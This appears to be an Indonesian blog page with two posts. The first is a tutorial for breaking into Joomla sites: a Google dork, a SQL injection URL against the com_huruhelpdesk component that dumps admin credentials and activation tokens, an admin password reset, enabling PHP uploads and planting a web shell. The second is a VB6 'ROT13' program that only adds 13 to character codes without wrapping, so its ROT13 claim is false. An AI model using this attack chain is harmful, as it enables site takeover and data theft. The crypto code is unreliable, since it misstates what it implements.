Wednesday, February 9, 2011

Tutorial Hacking With SQL Injection Pada Joomla


ok langsung saja kita menuju step by step dalam pengerjaannya.

==========
[+] step 1
==========

Buka google.. ketik keyword :
Code:
"inurl:/index.php?option=com_huruhelpdesk\"

Atau silahkan ke sini untuk liat Exploitnya Databasenya : Exploit Database

Tes satu per satu
coba kita ambil yang ini :



==========
[+] step 2
==========

Pasang exploit..
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

Maka akan menghasilkan gambar seperti dibawah ini:



Nah kita akan melihat admin nya... :P

==========
[+] step 3
==========

Coba kita reset password nya :
/index.php?option=com_user&view=reset

hmmm... minta email dia.. masukin saja email admin tadi..

Then enter..

==========
[+] step 4
==========

Minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya :
Code:
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u​sers--



Tuh kan keluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)

==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)



==========
[+] step 6
==========

Hehehehe
Dia minta pasword baru tu.. kasih aja..



==========
[+] step 7
==========

OK langsung aja masuk ke admin nya..
http://[site]/[pacth]/administrator



==========
[+] step 8
==========

masuk ternyata.. heheh
sabar²..



nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"

==========
[+] step 9
==========

Nah.. kita ke global configuration terlebih dahulu...

Ubah media settingnya, tambahin aja extension PHP


jangan lupa di save..
:D

==========
[+] step 10
==========

OK
lanjut..
Buka media manager..

nah, ini tahap terakhir..



Silahkan Upload Shell php mu..
seep selesai..

Bila tidak ada tulisan berwarna merah berarti berhasil..

Maka Shell kita akan berada di sini :
http://[site]/[pacth]/images/namashell.php

OK sekarang terserah kalian.. mau diapain tu site..

saran saya.. kalo bisa..
upload aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..

sekian aja dulu
Selamat mencoba.. :D

Tuesday, February 8, 2011

Tips and Trick Membuat Program Enkripsi Sederhana With VB 6


Ok Kembali Lagi Bersama saya, sekarang saya akan membagi sedikit ilmu mengenai VB [ Visual Basic ]
kali ini kita akan membahas mengenai pembuatan Eknripsi sederhana menggunakan Visual Basic 6.
Langsung saja pertama-tama Yang harus kita Siapkan adalah :

1. Buat form seperti dibawah ini :



2. isi propertiesnya Seperti dibawah ini :



3. isi scpript dibawah nie :
Sub Rot13()
For I = 1 To Len(txtTeks)
Baca = Asc(Mid(txtTeks, I, 1))
'Secara matematis C = ROT13(M)
Tukar = Chr(Baca + 13)
txtHasil = txtHasil & Tukar
Next
End Sub
Sub DeRot13()
For I = 1 To Len(txtTeks)
Baca = Asc(Mid(txtTeks, I, 1))
'Ekuivalen dengan M = ROT13(ROT13(M))
Tukar = Chr(Baca - 13)
txtHasil = txtHasil & Tukar
Next
End Sub
Private Sub cmdDekrip_Click()
txtHasil = ""
DeRot13
End Sub
Private Sub cmdEnkrip_Click()
txtHasil = ""
Rot13
End Sub

4. Coba jalankan programnya :




Untuk Penjelasannya dibawah ini :

Penjelasan Script :

Sub Rot13()
For I = 1 To Len(txtTeks)
Baca = Asc(Mid(txtTeks, I, 1))
'Secara matematis C = ROT13(M)
Tukar = Chr(Baca + 13)
txtHasil = txtHasil & Tukar
Next
End Sub

Baris enkripsi dari ROT13.
Ubah setiap karakter menjadi karakter + 13,
huruf “a” digantikan dengan huruf “n”, huruf “b” digantikan dengan huruf “o”, dst.

Sub DeRot13()
For I = 1 To Len(txtTeks)
Baca = Asc(Mid(txtTeks, I, 1))
'Ekuivalen dengan M = ROT13(ROT13(M))
Tukar = Chr(Baca - 13)
txtHasil = txtHasil & Tukar
Next
End Sub

Merupakan baris kode dekripsi yang merupakan kebalikan dari enkripsi.
Dalam rumus kita dapatkan M = ROT13(ROT13(M)).
Saya bingung bagaimana menerjemahkannya ke source visual basic.
Daripada susah-susah balik saja operatornya yang tadinya.
Tukar = Chr(Baca + 13) menjadi Tukar = Chr(Baca - 13)
Terlihat memang, operator ( + ) diganti menjadi ( - ).
He... he.. yang pentingkan ekuivalen dengan M = ROT13(ROT13(M)) dan tidak perlu
ROT13 dua kali segala, untuk dekripsinya. Efisiensi coy! Efisiensi!

Private Sub cmdDekrip_Click()
txtHasil = ""
DeRot13
End Sub

Kalau button Dekripsi ditekan maka:
Kosongkan properti text pada textbox txtHasil.
jalankan sub program DeRot13().

Private Sub cmdEnkrip_Click()
txtHasil = ""
Rot13
End Sub

Kalau button Enkripsi ditekan maka:
Kosongkan properti text pada textbox txtHasil.
jalankan sub program Rot13().

Sekian Dulu Penjelasan dari saya , Semoga ini bisa Bermanfaat Buat Kalian :D

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online